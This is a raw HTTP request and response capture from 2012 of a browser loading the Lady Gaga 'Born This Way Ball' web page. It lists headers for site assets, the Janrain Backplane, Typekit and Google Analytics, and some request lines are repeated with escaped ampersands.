GET /v1.2/bus/umg/channel/585ac179036b74a26c2b4d7fc013d9fa?callback=Backplane.response&amp;rnd=0.5028386343263664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-4f41e134
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.906272367524747 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.906272367524747 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-b716dfca
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.4639118462394022 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.4639118462394022 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-4ee65a34
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /v1.2/bus/umg/channel/585ac179036b74a26c2b4d7fc013d9fa?callback=Backplane.response&rnd=0.32379838363576596 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/585ac179036b74a26c2b4d7fc013d9fa?callback=Backplane.response&amp;rnd=0.32379838363576596 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-d92484a2
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/shadowbox.css HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM; backplane-channel=umg:585ac179036b74a26c2b4d7fc013d9fa
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;aafc48b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 923
Vary: Accept-Encoding
Cache-Control: private, max-age=511
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/languages/shadowbox-en.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM; backplane-channel=umg:585ac179036b74a26c2b4d7fc013d9fa
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;18d6cb8b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 295
Vary: Accept-Encoding
Cache-Control: private, max-age=469
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; path=/
GET /aspnet_client/microgroove/windows/themes/theme.ashx?s=modal&t=text/css&v=1 HTTP/1.1

Host: www.ladygaga.com
GET /aspnet_client/microgroove/windows/themes/theme.ashx?s=modal&amp;t=text/css&amp;v=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/aspnet_client/microgroove/shadowbox/shadowbox.css
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: text/css
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=2592000
Content-Length: 525
Content-Encoding: gzip
Expires: Wed, 05 Dec 2012 19:02:02 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:03 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /backplane.js HTTP/1.1

Host: d134l0cdryxgwa.cloudfront.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
If-Modified-Since: Fri, 02 Nov 2012 14:16:18 GMT
If-None-Match: W/&quot;15289-1351865778000&quot;
HTTP/1.0 304 Not Modified

HTTP/1.0 304 Not Modified
Connection: keep-alive
Date: Mon, 05 Nov 2012 19:02:03 GMT
Etag: W/&quot;15289-1351865778000&quot;
Last-Modified: Fri, 02 Nov 2012 14:16:18 GMT
Age: 81191
X-Amz-Cf-Id: S_ad9iMBCzZGIwl4v-1EBmWREzI6pi9dD47U69Z_2RDhkEtpWHvlDg==
Via: 1.0 cacff3534bf6dc97c5efb0e2f25f6c15.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /v1.2/bus/umg/channel/5049b78321497758400424e29d8feab4?callback=Backplane.response&rnd=0.1612358409572413 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/5049b78321497758400424e29d8feab4?callback=Backplane.response&amp;rnd=0.1612358409572413 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:03 GMT
EC2-instance-id: i-4d468230
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/players/shadowbox-iframe.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;e8e8de8b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 447
Vary: Accept-Encoding
Cache-Control: private, max-age=394
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:03 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /aspnet_client/microgroove/shadowbox/players/shadowbox-img.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;e8e8de8b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 990
Vary: Accept-Encoding
Cache-Control: private, max-age=476
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/adapters/shadowbox-jquery.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;6411c78b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 445
Vary: Accept-Encoding
Cache-Control: private, max-age=443
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /v1.2/bus/umg/channel/6bd972b8ebad6299d147f888d254078c?callback=Backplane.response&rnd=0.04398764439141423 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/6bd972b8ebad6299d147f888d254078c?callback=Backplane.response&amp;rnd=0.04398764439141423 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-bf16dfc2
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /v1.2/bus/umg/channel/6bd972b8ebad6299d147f888d254078c?callback=Backplane.response&rnd=0.6531256959372643 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/6bd972b8ebad6299d147f888d254078c?callback=Backplane.response&amp;rnd=0.6531256959372643 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-df4aeaa4
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352142123674 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352142123674 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Mon, 05 Nov 2012 19:02:03 GMT
Expires: Mon, 12 Nov 2012 19:02:03 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Mon, 05 Nov 2012 13:21:26 GMT
Expires: Tue, 06 Nov 2012 01:21:26 GMT
Vary: Accept-Encoding
Age: 20437
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /css/fancybox.css HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Server: Apache
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 131613
Date: Mon, 05 Nov 2012 19:02:04 GMT
Last-Modified: Thu, 05 Apr 2012 07:33:08 GMT
Content-Length: 1585
Connection: keep-alive
GET /bornthiswayball/images/logo.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 10 Apr 2012 21:37:54 GMT
Accept-Ranges: bytes
Etag: &quot;0e5cf2f6217cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 75197
Date: Mon, 05 Nov 2012 19:02:04 GMT
Connection: keep-alive
GET /libs/v1/jquery-pack.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 11 Oct 2012 16:44:31 GMT
Etag: d74af802a5acfeae38607a8d0b309288
Vary: Accept-Encoding
X-Timestamp: 1349973871.16302
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 11 Oct 2012 16:44:09 GMT
Accept-Ranges: bytes
X-Trans-Id: txb7658eed822e42d9b9a07b9be7e36ac7
Content-Encoding: gzip
Content-Length: 59799
Cache-Control: public, max-age=626
Expires: Mon, 05 Nov 2012 19:12:29 GMT
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /bornthiswayball/images/skype.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 11 Sep 2012 18:52:31 GMT
Accept-Ranges: bytes
Etag: &quot;80c1db984e90cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2741
Date: Mon, 05 Nov 2012 19:02:04 GMT
Connection: keep-alive
GET /bornthiswayball/images/btn-enter.png HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Wed, 30 Nov 2011 18:05:11 GMT
Accept-Ranges: bytes
Etag: &quot;80a5f1998aafcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 1838
Date: Mon, 05 Nov 2012 19:02:04 GMT
Connection: keep-alive
GET /bornthiswayball/images/bg2.jpg HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a03+PM; backplane-channel=umg:6bd972b8ebad6299d147f888d254078c
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Tue, 10 Apr 2012 21:38:02 GMT
Accept-Ranges: bytes
Etag: &quot;09994346217cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 124157
Date: Mon, 05 Nov 2012 19:02:03 GMT
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=269405610&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1549038701&utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=269405610&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1549038701&amp;utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:21:39 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 409226
Server: GFE/2.0
GET /k/mxd3gmg-d.css?3bb2a6e53c9684ffdc9a9bf71b5b2a6295e5720163621489f1819d0db135269511600c2f7c2b8d7fceb0e6d16d4e2cdfcab2282e49be9f4c89c30a366459721fbcad6c743493934698da63b2c1a4d61fca95905b78b4234a4486d13bd13bb5fab6fb7cf00134e53e30fa2608a2d243 HTTP/1.1

Host: use.typekit.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
